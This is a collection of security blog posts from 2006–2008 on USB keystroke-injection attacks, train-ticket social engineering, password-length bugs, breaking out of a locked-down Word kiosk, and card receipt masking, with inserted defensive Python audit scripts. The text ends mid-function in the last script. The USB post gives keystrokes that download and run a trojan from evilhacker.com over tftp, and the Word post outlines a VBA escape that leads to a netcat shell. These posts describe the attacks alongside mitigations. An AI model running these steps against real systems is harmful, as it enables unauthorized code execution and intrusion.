Ogenstad.net: Security Stories and Help with Network Documentation
https://ogenstad.net

How far do you trust an unknown USB Stick?
https://ogenstad.net/2008/09/11/how-far-do-you-trust-an-unknown-usb-stick/
Thu, 11 Sep 2008 21:15:45 +0000

[Image: USB Stick]

Suppose there was an unknown USB stick, waiting to be found in your parking lot. Perhaps this would scare you enough to disable autorun throughout your domain (you’ve done that, right?). Now imagine if someone gave one of your users a USB device which was connected to a workstation on your network, and in turn your network was compromised. How would you explain that?

I don’t know if this is a new idea, but the thought came to me while listening to the pilot episode of the Securabit Podcast; thanks to Martin for pointing to the podcast. In this episode they talk about YubiKey. The YubiKey is a USB authentication solution: when you plug the YubiKey (a USB device) into your computer it is recognized as a USB keyboard. It has one button, and when pressed it enters a one-time password. I won’t go into any details, but if you’re interested you can watch a one-minute video on the YubiKey site or listen to the Securabit Podcast.

The product got me thinking: what if someone were to make a device that looks like a USB stick but is in fact a USB keyboard, just like the YubiKey? However, instead of being programmed to enter a random password string it would be made to enter a malicious string of characters. For example, an attacker might choose to target a Windows box with these keystrokes:

[windows] + r
cmd.exe [enter]
tftp -i evilhacker.com GET trojan.exe %temp%\trojan.exe [enter]
%temp%\trojan.exe [enter]
exit [enter]

This would install a trojan on the target computer (assuming the user is allowed to run tftp) simply because the device was connected to the computer.

This shouldn’t be a great threat, and this attack in particular would be mitigated by just locking the screen. However, it still doesn’t hurt to have respect for the unknown, and I’d stay away from those USB sticks found in the parking lot.

Social Engineering on the Train
https://ogenstad.net/2008/08/19/social-engineering-on-the-train/
Tue, 19 Aug 2008 07:11:45 +0000

[Image: Train Ticket]

During your childhood I’m sure you experienced a lot of magic; some things were just so fantastic and mind-boggling you just couldn’t figure them out. For me, one of these extraordinary events was the work of train conductors. Before you laugh, hear me out!

On some of the overground trains in Sweden you don’t need a ticket to get on the train; however, when the train conductor asks for your ticket you should be prepared to show it. So if you’re never asked, you basically don’t need the ticket.

There was usually just one train conductor for the entire train, and he would walk between the different wagons at each station. Stepping into a wagon, he could walk up to all the passengers who had boarded since he last came through and ask them for their tickets.

What used to blow my mind was that, as if by magic, the train conductors would always know who the new passengers were. They wouldn’t bug the existing passengers who had already shown their tickets. When I was a child I thought they must be superhuman, that they either had fantastic memories or were absolutely brilliant at what they did.

Traveling on the same trains now, I can see it so easily. The train conductors don’t ask me for my ticket anymore, though they ask everyone around me.

I still have a monthly pass, as it would go against my morals not to have a valid ticket; besides, I also use it to ride the bus and the subway. I just find it interesting to experiment with social engineering in a harmless environment.

What I noticed was that when the train conductor entered the wagon, all the new passengers would reach for their tickets. Everyone who had already shown their ticket just ignored the train conductor.

In reality the train conductors aren’t looking for new passengers; they are looking for people who want to show their tickets, or rather, they are looking for people who behave in a certain way.

So if I just ignore them when they come, they ignore me. I’ve also tried looking at them, even making eye contact and smiling. As long as I don’t reach for my ticket, I’m safe.

Looking at this from a security perspective, they are very poor security guards. Their job is to protect the resource (the train ride) from unauthorized use (passengers who don’t pay).

Of course, taking this one step further, this could be according to plan, in the name of user-friendliness: as in, don’t bug and annoy users who have already shown their pass. I would put my money on the former explanation.

In terms of social engineering this is really the low-hanging fruit. You don’t have to engage in conversation or ask questions. It’s as easy as walking past a manned reception: if you behave like you belong on the inside, many will just assume you do.

Failure to Link in
https://ogenstad.net/2007/01/29/failure-to-link-in/
Mon, 29 Jan 2007 19:28:55 +0000

You’ve probably heard of LinkedIn. I had been thinking of signing up for some time but always postponed it. Finally I decided to give it a go; like many of these Internet services it’s real easy to register and get started, and most people can do it in minutes. Of course, the registration process was beyond me.

The idea with LinkedIn is to connect people and make them network; this has been happening in the real world for ages. For example, last week I saw that the toilet in my basement was leaking, and shortly afterwards the water in the shower next to it started to rise. It got ugly in a hurry; in fact I think I know where they got the inspiration for the movie.

Working with Cisco, they keep telling me that it’s like network plumbing, but I assure you there’s plumbing and there’s plumbing. After doing some basic troubleshooting it was time to call in the cavalry, but alas, I had never hired a plumber and didn’t know how to find a good one (one that I could trust).

To the rescue comes a neighbor: after talking with him he picks up his cell phone and calls a friend of his who works in the field. Now my plumbing problems are gone, and this is an offline example of what LinkedIn can do: networking. Better yet, when the plumber heard that I work as a network consultant he was interested in my services!

It all sounds great. However: “There’s no username that matches with that password.”

Hm, that’s strange, I just created the account. I figured something went wrong, so I reset my password; still no dice. Mind you, I don’t panic at this stage; I’m used to having problems registering different accounts. First I remove the funky characters from my password and try again.

The site is still unaware of my username and password. My next bet is the length of the password. Since I can’t very well view the internal code of the site, I have to settle for the HTML code I can see:

<input id="session_password#login" type="password" size="24" name="session_password">

My password was 22 characters, so I shouldn’t be having a problem, but the search continues. On the password reset page I see this code instead:

<input type="password" name="new_password" value="" id="new_password#newPassword#passwordReset" size="16" maxlength="16">

Aha, maximum password length = 16. I don’t think too many people have this problem, however if my password is too long, please tell me!
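The mismatch above can be found without reading the site's back-end code at all: the two forms disagree about how long a password may be, and only one of them says so in its markup. As an added example (not code from the original post), here is a small Python audit that wraps the two input tags quoted above in constructed login and reset forms and reports any password field whose maxlength caps what a user can type, plus any case where forms for the same credential disagree about that cap. The form markup around the two tags and the 22-character password length are assumptions for the demonstration.

```python
"""Audit password fields in HTML forms for silent length limits.

Added example, not from the original post. Standard library only, so it
runs offline against the constructed form markup below.
"""
from html.parser import HTMLParser

# Constructed sample: the two <input> tags quoted in the post, wrapped in
# minimal form markup so the parser has something to walk.
LOGIN_FORM = '''
<form action="/login" method="post">
  <input id="session_key#login" type="text" size="24" name="session_key">
  <input id="session_password#login" type="password" size="24" name="session_password">
</form>
'''

RESET_FORM = '''
<form action="/reset" method="post">
  <input type="password" name="new_password" value=""
         id="new_password#newPassword#passwordReset" size="16" maxlength="16">
</form>
'''


class PasswordFieldParser(HTMLParser):
    """Collect every <input type="password"> together with its size and maxlength."""

    def __init__(self):
        super().__init__()
        self.fields = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        a = dict(attrs)  # attribute values may be None for bare attributes
        if (a.get("type") or "").lower() != "password":
            return
        size = a.get("size") or ""
        maxlength = a.get("maxlength") or ""
        self.fields.append({
            "name": a.get("name"),
            "id": a.get("id"),
            # size only affects the visible width of the box, not what is accepted
            "size": int(size) if size.isdigit() else None,
            # None means the field has no explicit cap
            "maxlength": int(maxlength) if maxlength.isdigit() else None,
        })


def password_fields(html):
    """Return a list of dicts describing each password input in `html`."""
    parser = PasswordFieldParser()
    parser.feed(html)
    return parser.fields


def effective_cap(fields):
    """Smallest maxlength among the password fields, or None if none is capped.

    The smallest cap is what matters: a password accepted on one form but
    refused on another is exactly the symptom described in the post.
    """
    caps = [f["maxlength"] for f in fields if f["maxlength"] is not None]
    return min(caps) if caps else None


def audit(forms, password_length):
    """Return findings for a user whose password has `password_length` characters.

    `forms` maps a label (e.g. "login", "reset") to its HTML. One finding is
    produced for every form whose cap is below the password length, and one
    more if the forms do not agree on a cap.
    """
    findings = []
    caps = {}
    for label, html in forms.items():
        cap = effective_cap(password_fields(html))
        caps[label] = cap
        if cap is not None and password_length > cap:
            findings.append(f"{label}: password field capped at {cap}, "
                            f"a {password_length}-character password will not fit")
    if len(set(caps.values())) > 1:
        findings.append(f"forms disagree about the cap: {caps}")
    return findings


if __name__ == "__main__":
    for line in audit({"login": LOGIN_FORM, "reset": RESET_FORM}, 22):
        print(line)
```

Running it against the two constructed forms reports that the reset form caps the password at 16 while the login form states no cap, which is the 22-character failure the post describes.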

Anyway, now I’m LinkedIn, and here is my public profile.

Tags: password policy, maximum password length, linkedin, bad programming

Breaking out of Jail with Microsoft Word
https://ogenstad.net/2006/10/04/breaking-out-of-jail-with-microsoft-word/
Wed, 04 Oct 2006 19:10:46 +0000

“Can you really break out of jail with just Microsoft Word, or are you just pulling my leg?”

No, I would never do that; Word is really powerful, it can take you places!

Intended audience

If you are a convicted felon and reading this from prison: sorry, but you are not the target audience. However, don’t despair: there’s something in here for you too!

This article is for people who care about security. If you don’t fall into this second category you really are in the first group, i.e. not the intended audience. When I talk about “jail”, I’m referring to a restricted Windows environment. By that I mean a locked-down Terminal Services session, or a public Windows XP box in “kiosk” mode.

Administrators who have locked down their Terminal Services sessions care about what users can do on the machine. They only want users to run the programs that are approved by the security policy. This means no cmd.exe, no FreeCell and no poking around in the system.

So why isn’t this article for people who haven’t locked down their environments? Because of the good ol’ “Security is a Weakest Link Problem”: if you haven’t even tried to lock down your environment, you have other issues to take care of before you read this article.

Operation Lockdown

For the environment that I have set up to test this, I’ve installed a Windows Server 2003 machine and set it up to run Terminal Services. I’ve also installed Office; the goal here is to only allow a user to run Microsoft Word and nothing else.
The user’s desktop is then redirected to a share where the user doesn’t have write access. The desktop contains one item: a link to Word. Logging in to the terminal server, everything looks good; the user can basically run Word and change his password.

Apart from the settings above, the rest of the GPO settings are listed in the appendix at the end of this article. It’s basically a few lockdown settings and a software restriction policy defaulting to “Disallowed”, with an additional path rule allowing Microsoft Word.

Given this configuration, let’s see what we can do.

Where does Word enter into it?

I guess the title says it all: yes, Word is the application we are going to use to break out of the locked-down jail. If you’ve tried my SYDI project, you’ve probably realized that I like Office automation. This concept would work in any Office application, but I have chosen Word. If you don’t have Office installed in your locked-down environment, I still think you should continue reading. Hopefully you’ll enjoy the article anyway.

What I’ve done is write a Word macro which allows me to run shell commands or code of my choice.

You might object and say, “So? I have Macro Security set to Very High. You’d have to digitally sign the macro first.”

I most certainly would not! The macro security setting in the Office suite is there to protect you against an entirely different threat. In that scenario the threat is that an attacker can send us (or our users) a Word document with an evil macro inside, which is run when we open the document.

This setting does not prevent developers from creating macros, running them while developing, and then signing them when they are in a state where they can be shared with others.

What does this mean for us? It means that we cannot use a pre-created Word document which contains the macro. We have to create the macro ourselves, on the fly, each time we want to run it. See the difference? The security setting in Word doesn’t prevent you from creating and running your own macros. If we saved the document and opened it again, then the security setting would kick in and block the macro. If we had signed it before saving, then we would be allowed to run it.

To prevent this we would need a setting in Office called “Don’t Allow Users to Develop Macros”.

VBA-PrisonBreak

I named the macro I created VBA-PrisonBreak (I must have been watching too much TV). You can download VBA-PrisonBreak from here. To test it in your environment, open up Microsoft Word and press [Alt]+[F11] to enter the VBA editor. Double-click on “ThisDocument”. This will give you a code window on the right side. Copy the contents of the VBA-PrisonBreak.txt file and paste it into the window. The file contains different subroutines, or programs if you will.

To run one of these programs, place the cursor somewhere between the Sub [Program] line and its End Sub statement. To execute the program you press Play or [F5].

To give it a try and test something harmless, start the routine called RunCommand() and enter:

ping 127.0.0.1

When the command has completed, go back to the Word document. If everything worked as it should, you will see which command you tried to run and the results.

Let’s see if we can poke around a bit:

cmd /c dir

Hm, this won’t work unless command prompt scripting is allowed. Then again, we can create scripts of our own and run them instead. Another subroutine of VBA-PrisonBreak is called ListFilesinFolder() and takes a directory as an argument. This is just a simple example, but a lot can be accomplished by scripting.

So far we haven’t done anything terribly exciting. The commands we can run using the RunCommand() routine depend on a few factors; let’s look at the Software Restriction Policies. We know we can run Word, but what about the default additional path rules? Among others, these cover commands under c:\windows and c:\windows\system32.

“net view” and “net user /domain” might be interesting and could give us some information. After looking around we might come to the conclusion that we want to run a command which isn’t allowed by the software restriction policy.

As a normal unprivileged user we will not have write access to c:\windows or c:\windows\system32, so we can’t place any files in those directories. But in our configuration we have write access to c:\windows\temp, and even better, CREATOR_OWNER has Full Control. If we can place a file in this directory we will be able to run it with RunCommand() by entering:

C:\windows\temp\mycommand.exe

Now how would we place a file there? We can’t just use copy, since cmd.exe is blocked. We might be able to use xcopy or tftp. If tftp isn’t available we might still be able to expand it (with expand.exe) from c:\windows\i386\tftp.ex_. There is also a function in VBA-PrisonBreak which lets you download files through HTTP (HTTPDownload()). It takes the source URL and target file as arguments.

From here we can download netcat and gain shell access to the server. Note that cmd.exe is still restricted; unfortunately an attacker can use another file or an edited version of cmd.exe. This edited shell file can then be placed under c:\windows\temp.

It is important to realize that the credentials used in this shell will be those of the unprivileged user account.

How to Protect Yourself

It’s really easy to protect yourself against this feature; remember, this is not a vulnerability or an exploit in Windows or Word. We are trying to remove features from Windows (such as disabling cmd.exe), since the features we want to remove can be used in harmful ways.

When you install Office you don’t have to install all the features; one of these features is VBA (Visual Basic for Applications). Without VBA this prison break wouldn’t be possible (in the way I’ve described). You can find information about this in the Office Security pages. However, as you can see on that page, Microsoft recommends that you don’t disable VBA and also lists the reasons why, so you have to decide for yourself. This page also mentions the “Very High” macro setting, but remember what I said before: this setting doesn’t apply in this context.

Another option is to disable VBA through group policies. You can do this by using the .ADM files for Microsoft Office. This is only an option if you won’t be using any macros.

Even if your business requires you to be able to run VBA, I have three words for you: Defense in Depth. If one part of the system fails, this shouldn’t mean that the defense has been breached.

The default Software Restriction Policies obviously didn’t restrict as much as we would have hoped. We will definitely want to explore these settings. If a user has write (and execute) permissions to any location within an SRP path rule, that user can run whatever he wants. You could set up deny rules for these directories, or you could tighten the NTFS permissions and remove execute permissions.
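The rule just stated can be checked mechanically rather than by poking around as a user. The following Python script is an added example, not part of the article or of VBA-PrisonBreak: it expands the default SRP path rules listed in the appendix, treats a folder rule as covering everything beneath that folder and a wildcard rule as covering only the files directly in its folder, and flags any directory an ordinary user can write to that lies inside an Unrestricted rule. The registry values (SystemRoot = C:\WINDOWS, ProgramFilesDir = C:\Program Files), the ACL table, and the assumption that SRP joins the registry value to the rest of the rule with a path separator are constructed for the demonstration, not read from a live server.

```python
"""Find user-writable directories inside Software Restriction Policy path rules.

Added example, not from the original article. Models the check described in
the text: a Disallowed default policy is only as tight as its Unrestricted
path rules, so any directory a user can write to (and execute from) beneath
such a rule is a hole. All data below is constructed sample data.
"""
import ntpath
import re

# Constructed: what the two registry variables in the default rules expand to.
REGISTRY_VALUES = {
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot": r"C:\WINDOWS",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir": r"C:\Program Files",
}

# The default additional path rules from the article's appendix (all Unrestricted).
DEFAULT_RULES = [
    r"%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%",
    r"%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%*.exe",
    r"%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%System32\*.exe",
    r"%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir%",
]

# Constructed ACL summary as (directory, principal, rights): "R" read, "W" write/create,
# "X" traverse/execute, "F" full control. Only entries relevant to an ordinary user.
SAMPLE_ACLS = [
    (r"C:\WINDOWS", "Users", "RX"),
    (r"C:\WINDOWS\system32", "Users", "RX"),
    (r"C:\WINDOWS\Temp", "Users", "WX"),                 # users may create files here
    (r"C:\WINDOWS\Temp", "CREATOR OWNER", "F"),          # and own what they create
    (r"C:\Program Files", "Users", "RX"),
    (r"C:\Documents and Settings\alice", "alice", "F"),  # writable, but outside every rule
]

# Principals that represent an ordinary, unprivileged user in this sample.
USER_PRINCIPALS = {"Users", "Everyone", "Authenticated Users", "CREATOR OWNER", "alice"}


def expand_rule(rule):
    """Replace %registry\\path% variables with their values.

    Assumption: SRP treats the registry value as a directory, so a separator
    is inserted between it and whatever follows the closing '%'.
    """
    def substitute(match):
        key = match.group(1)
        if key not in REGISTRY_VALUES:
            raise KeyError(f"unknown registry variable in rule: {key}")
        return REGISTRY_VALUES[key].rstrip("\\") + "\\"
    return re.sub(r"%([^%]+)%", substitute, rule).rstrip("\\")


def rule_covers(rule, directory):
    """True if a file created in `directory` would match the expanded rule.

    A folder rule (no wildcard) matches the folder and everything beneath it;
    a wildcard rule such as ...\\*.exe matches only files directly in its folder.
    """
    expanded = ntpath.normcase(expand_rule(rule))
    directory = ntpath.normcase(directory)
    if "*" in expanded:
        return directory == ntpath.dirname(expanded)
    return directory == expanded or directory.startswith(expanded + "\\")


def writable_by_user(acl_entries, directory):
    """True if any ordinary-user principal can create files in `directory`."""
    return any(d == directory and p in USER_PRINCIPALS and ("W" in r or r == "F")
               for d, p, r in acl_entries)


def find_holes(rules, acl_entries):
    """Return [(directory, [matching rules])] for user-writable dirs inside Unrestricted rules."""
    holes = []
    for directory in sorted({d for d, _, _ in acl_entries}):
        if not writable_by_user(acl_entries, directory):
            continue
        matching = [r for r in rules if rule_covers(r, directory)]
        if matching:
            holes.append((directory, matching))
    return holes


if __name__ == "__main__":
    for directory, rules in find_holes(DEFAULT_RULES, SAMPLE_ACLS):
        print(f"{directory} is user-writable and allowed by:")
        for r in rules:
            print(f"    {r}")
```

On a real server you would feed find_holes() an ACL dump from cacls or a similar tool instead of SAMPLE_ACLS. For the article's configuration the only directory reported is C:\WINDOWS\Temp, matched by the bare SystemRoot rule (the *.exe wildcard rules do not reach into subfolders), which is exactly the location the article uses; an NTFS deny on execute there, or an SRP Disallowed rule for it, closes the hole while leaving the rest of the defaults alone.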

It would be nice if the default policies provided some sort of protection, at least since Microsoft has written in several places that they shouldn’t be changed unless you are an “advanced user”. But the Software Restriction Policies can be fixed, and in this case that’s not really the problem. Since we can write VBA code we have a lot of options. VBA-PrisonBreak is mostly a proof of concept; it doesn’t really do much.

On a network level, if we take the example with tftp, there’s no reason why this should be allowed to or from your machine. If we were only supposed to run Word, allowing HTTP doesn’t make much sense either.

Earlier on I said it would be good if there was a setting in Office called “Don’t Allow Users to Develop Macros”. Unfortunately, as far as I know this kind of setting doesn’t exist. However, we can create one of our own. The VBA editor uses vbe6ext.olb, which by default is located at:

C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6EXT.OLB

If we deny the execute permission (NTFS) on this file for the users we want to lock down, they won’t be able to launch the VBA editor but will still be able to run signed macros. A little word of caution: I don’t know if there are any other issues you should be aware of when removing execute permissions on this file, but I don’t think there are.

The problem with scripting

The macro RunCommand() creates an object called Wscript.Shell. Is this required by your business? If you remove the NTFS execute permission (for the Terminal Services users) on the file c:\windows\system32\scrrun.dll, they won’t be able to use RunCommand().

Is there another library an attacker can use if you deny the features of Wscript.Shell? Disabling scrrun.dll would still allow a malicious user to download files with HTTPDownload(), which uses an object called Microsoft.XMLHTTP. There are a lot of scriptable libraries in Windows. Chasing them all down is hard, and it wouldn’t solve the whole problem.

As I said above, the problem isn’t related to Software Restriction Policies. Even if the SRPs are set up in a way that would prohibit the user from running a non-approved executable, that user would still be able to write VBA code. If VBA code isn’t scary enough, an attacker could pre-compile a DLL with a COM interface and load the functions from that DLL from VBA.

The Weakest Link

To find the weakest link you might have to think outside the box. But that is the fun part of security. 🙂

Ask Jesper what he thinks of security guides and he will tell you that they won’t make you secure (or in Jesper-/Steve-speak, you won’t be Protected).

I think security guides are great, but still they are just guides, not a blueprint for a secure network. Most guides are fairly generic and you have to decide what parts of them to use in your environment. The security of a network isn’t as strong as the sum of all security settings; it’s as strong as the weakest link. When it comes to SRPs, a guide can’t tell you which applications make sense in your environment.

Summary

VBA-PrisonBreak in itself won’t allow a malicious user to take control of your server. That user would have to escalate his privileges first, unless the attacker was a “power user” or an administrator to start with.

VBA-PrisonBreak is just a way to gain another foothold in your environment. When trying to protect our networks we don’t want to give any more ground than we have to.

If you are a criminal and have been wondering throughout this article how Word can help you get out of a real prison: it’s quite easy really; just open up Word and start writing “Dear Congressman”, press [enter] twice and write your plea for pardon. If you’re really lucky a magical paper clip will come to your aid!

Note: we did not lock down the Help menu in Word, but since we didn’t use it to gain access I chose to ignore that and a few other threats in this article.

Credits

I, Patrick Ogenstad, work at Netsafe. I would like to thank John Laerum from Cornerstone for providing feedback on this article.

If you liked this article, please stick around! You can subscribe to the “feed”, or get updates by email. Also be sure to check out my security fiction stories.

If you have any feedback concerning this, please post a comment or contact me.

Appendix

The group policy settings used in the test environment:

  • Hide these specified drives on My Computer – All Drives
  • Prevent Access to Drives on My Computer – All Drives
  • Remove My Computer Icon on the Desktop
  • Remove My Documents icon from Start Menu
  • Remove Help Menu from Start Menu
  • Remove and prevent access to the shutdown command
  • Remove All Programs list from the Start Menu
  • Prohibit Access to Control Panel
  • Remove pinned Program list from Start Menu
  • Remove frequent program list from Start Menu
  • Remove Search Menu from Start Menu
  • Remove Run Menu from Start Menu
  • Remove Recycle Bin icon from Desktop
  • Prevent Access to the Command Prompt – Disable Command prompt scripting also
  • Prevent Access to registry editing tools
  • Run Only Allowed Windows Applications – winword.exe
  • Software Restriction Policies – Default Security Level – Disallowed

I have left the default additional path rules as unrestricted:

  • %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%
  • %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%*.exe
  • %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%System32\*.exe
  • %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir%

Office is installed on D:\ so I added one path rule:

  • D:\Program Files\Microsoft Office\OFFICE11\winword.exe

Tags: Security, Locked Down, Software Restriction Policies, Terminal Services, VBA

How To NOT Print Credit Card Receipts
https://ogenstad.net/2006/06/11/how-to-not-print-credit-card-receipts/
Sun, 11 Jun 2006 14:42:03 +0000

The size of my wallet tends to grow fat every once in a while. I usually don’t carry a lot of cash, so I blame all the receipts I tend to keep. Since I try to avoid carrying cash I pay for almost everything with my credit card. Out of curiosity I wanted to see if I could get my credit card number by combining all the different receipts.

The card has sixteen numbers in four groups, not counting the secret three on the back of the card, and an expiration date.

Practically every receipt had the expiration date printed on it; for the rest there was a big variation. Say that my card number was:

1234 5678 9012 3456

Some would mask all but one group:

**** **** **** 3456

Others would just mask one group:

1234 5678 **** 3456

After going through them all it seemed like group three was always masked. I have a feeling that this would be different if I had more receipts, then again I can’t be sure. I’ll be checking this in the future. I’ve read about a law in the US (Federal Fair Credit Reporting Act) that would require that only the last 5 numbers are shown. In Sweden I don’t know if we have such a law.

The last receipt I found in my wallet was the one from the taxi home on Friday when I had had a night out. This taxi company actually printed out my full credit card number on the receipt along with the expiration date.

I can’t imagine how the company can be that stupid; I’ve sent them an email and now I’m eagerly awaiting their response.
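The aggregation described above, several receipts with different masks adding up to more than any one of them shows, can be turned into a check that a merchant or an assessor can run over the masks a system prints. This Python snippet is an added example, not the post’s own code: it merges the masks used on several receipts for one card and reports how many of the 16 digits end up exposed, and it tests a single receipt against a truncation rule (the default is the post’s reading of the US rule, at most the last 5 digits; the first-6/last-4 display rule from PCI DSS can be passed as parameters). The receipt lines are constructed from the post’s own placeholder number 1234 5678 9012 3456, which is not a real card.

```python
"""Aggregate exposure check for masked card numbers on receipts.

Added example, not from the original post. All receipt strings below are
constructed from the post's placeholder number, not real card data.
"""
import re

PAN_LENGTH = 16


def normalise(receipt_line):
    """Strip spaces; keep digits and '*' placeholders; require 16 positions."""
    compact = re.sub(r"\s+", "", receipt_line)
    if not re.fullmatch(r"[0-9*]{%d}" % PAN_LENGTH, compact):
        raise ValueError(f"not a {PAN_LENGTH}-position card mask: {receipt_line!r}")
    return compact


def merge(receipts):
    """Combine masked copies of the same PAN: a digit shown on any receipt wins.

    Raises if two receipts show different digits at the same position, which
    means they are not from the same card and must not be merged.
    """
    merged = ["*"] * PAN_LENGTH
    for line in receipts:
        for i, ch in enumerate(normalise(line)):
            if ch == "*":
                continue
            if merged[i] not in ("*", ch):
                raise ValueError(f"receipts disagree at position {i}: not the same card?")
            merged[i] = ch
    return "".join(merged)


def exposure(receipts):
    """Return (merged mask, digits exposed, whether the full PAN is recoverable)."""
    merged = merge(receipts)
    shown = PAN_LENGTH - merged.count("*")
    return merged, shown, shown == PAN_LENGTH


def compliant_mask(receipt_line, max_leading=0, max_trailing=5):
    """True if one receipt shows at most `max_leading` first and `max_trailing` last digits.

    Defaults follow the post's description of the US rule (last 5 at most);
    pass max_leading=6, max_trailing=4 for the PCI DSS display rule.
    """
    compact = normalise(receipt_line)
    middle = compact[max_leading:PAN_LENGTH - max_trailing]
    return set(middle) <= {"*"}


def format_groups(compact):
    """Re-insert the four-digit grouping for display."""
    return " ".join(compact[i:i + 4] for i in range(0, PAN_LENGTH, 4))


# Constructed receipts for the post's placeholder card, in the forms the post shows.
WALLET = [
    "**** **** **** 3456",  # all but the last group masked
    "1234 5678 **** 3456",  # only group three masked
]
TAXI_RECEIPT = "1234 5678 9012 3456"  # the full number, as the taxi company printed it


if __name__ == "__main__":
    for label, receipts in (("wallet", WALLET), ("wallet + taxi", WALLET + [TAXI_RECEIPT])):
        merged, shown, full = exposure(receipts)
        print(f"{label}: {format_groups(merged)} ({shown}/{PAN_LENGTH} digits, "
              f"{'full PAN recoverable' if full else 'not recoverable'})")
    for line in WALLET + [TAXI_RECEIPT]:
        print(f"{line}: {'ok' if compliant_mask(line) else 'too much shown'}")
```

The wallet receipts alone already expose 12 of 16 digits once read together; adding the taxi receipt makes the whole number recoverable. Only the first receipt form passes the per-receipt check, which is the point: the aggregate stays safe only if every receipt individually masks the same positions.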

I don’t know how many dumpster divers we have in my area, but it would be nice not to have to shred everything you throw away; I mean, it is a bit hot to use the fireplace during the summer. 🙂

Tags: security, credit cards, stupidity

The Failure of Information Security
https://ogenstad.net/2006/05/10/the-failure-of-information-security/
Wed, 10 May 2006 20:07:54 +0000

“They say if you drop a frog in a pot of boiling water, it will, of course, frantically try to scramble out. But if you place it gently in a pot of tepid water and turn the heat on low, it will float there quite complacently. As you turn up the heat, the frog will sink into a tranquil stupor and before long, with a smile on its face, it will unresistingly allow itself to be boiled to death. The security industry is much like that frog; completely and uncontrollably in disarray – yet we tolerated it since we are used to it.”

This paragraph starts off Noam Eppel’s article titled The Complete, Unquestionable and Total Failure of Information Security. I think it’s a very interesting read, but I don’t entirely agree with his more or less pitch-black view of things. I guess it reminds me too much of Despair Inc.

There are a lot of problems when it comes to IT security, but this doesn’t differ much from the “real world”. Sure, you have click-and-play rootkits and whatnot; anybody can learn to break into a computer using easily found tools. You don’t have to be skilled to grab someone’s purse, steal a car, physically “deface” someone, blackmail, steal from the office and so on.

OK, so the Internet is a dangerous place. This doesn’t mean consumers or corporations can’t mitigate the risks and stay reasonably secure.

Might I guess that the user who created the screenshot with all the spyware wasn’t logged in as a limited user?

Anyway, I’m looking forward to Noam’s next update, and make sure you read his article.

Tags: security, cyber crime, hacking

Speaking of Stupid Hackers
https://ogenstad.net/2006/05/09/speaking-of-stupid-hackers/
Tue, 09 May 2006 15:37:47 +0000

Martin McKeay has a post about another brilliant way to get caught. Since this guy actually put people’s lives at risk, I hope he gets a harsher punishment than the credit card guy.

[tags]security, hacking[/tags]

Buying a Spot in Prison with a Stolen Card
https://ogenstad.net/2006/05/05/buying-a-spot-in-prison-with-a-stolen-card/
Fri, 05 May 2006 12:21:21 +0000

This is just sad: according to this article, a guy is facing one to two years in jail for hacking. He got caught stealing credit card information and ordering goods, which he shipped to his home address. I have two theories about what happened.

  1. He is so stupid he deserves jail time for that too, along with his other crime.
  2. He has a brother in jail and has seen Prison Break, now he is about to free his brother.

I think I favor the stupidity theory. To make the prison stay a bit more comfortable, I’ll just go ahead and recommend this colorful wallpaper to decorate the cell.

[tags]cyber crime, fraud, stupidity[/tags]

PayPal’s Security Question
https://ogenstad.net/2006/05/04/paypals-security-question/
Thu, 04 May 2006 19:35:57 +0000

I was setting up a personal PayPal account today, and during registration it wanted me to provide answers to two “secret questions”. This is nothing new, and usually I just do what Bruce Schneier recommends in his “Curse of the Secret Question” column: enter gibberish.

Feeling very clever, I press the signup button. The result:

Your information is incomplete or incorrect. Please correct the fields below and try again:

  • You may not enter numbers in your mother’s maiden name.
  • You must enter exactly four numbers or letters for the last four digits of your driver’s license number.

What could possess anyone to do this? This is just plain stupid. PayPal’s password policy forces you to have eight or more characters, but the answer to the driver’s license question must be exactly four letters or digits, and the maiden-name answer may not contain digits at all. A secret question is a password-reset path, so it should be at least as hard to guess as the password it can bypass; here the rules cap the answer at a few million possibilities and forbid the one thing (gibberish) that would make it strong.
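As an added example, not code from the original post or from PayPal, the following Python reconstructs the two rules implied by the error messages quoted above (an assumption about how the form behaved; the question keys and function names are mine), measures the keyspace those rules leave, and puts a hardened policy beside them: the answer is treated as a secret with only a length floor (the eight-character floor is an assumed choice matching the post’s password policy), normalized, and stored as a salted PBKDF2 hash rather than in the clear.

```python
"""Secret-question answer policies: the weak rules PayPal's error messages
imply, beside a hardened alternative.

Added example, not code from the original post or from PayPal. The "weak"
rules are reconstructed from the two quoted error messages and are an
assumption about the form's behaviour; question keys, function names and the
8-character floor of the hardened policy are this example's own choices.
"""
import hashlib
import hmac
import math
import os
import re
from typing import Optional

# Error strings quoted from the post; the question keys are assumed names.
MAIDEN_NAME_ERROR = "You may not enter numbers in your mother's maiden name."
LICENSE_ERROR = ("You must enter exactly four numbers or letters for the last "
                 "four digits of your driver's license number.")


def weak_validate(question: str, answer: str) -> Optional[str]:
    """Reproduce the observed rules: return the form's error text, or None if accepted."""
    if question == "mothers_maiden_name":
        # Digits are rejected, so a random answer such as "Kj8#2qL9mZ" is refused.
        return MAIDEN_NAME_ERROR if re.search(r"\d", answer) else None
    if question == "drivers_license_last4":
        # Exactly four letters or digits: every accepted answer lives in a 36^4
        # space (case-insensitive) and the user cannot choose anything stronger.
        return None if re.fullmatch(r"[A-Za-z0-9]{4}", answer) else LICENSE_ERROR
    raise ValueError(f"unknown question {question!r}")


def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Bits of entropy in a uniformly random string of `length` symbols."""
    return length * math.log2(alphabet_size)


def strong_validate(answer: str) -> Optional[str]:
    """Hardened policy: the answer is a secret, so only a length floor applies."""
    if len(answer.strip()) < 8:  # assumed floor, matching the password policy
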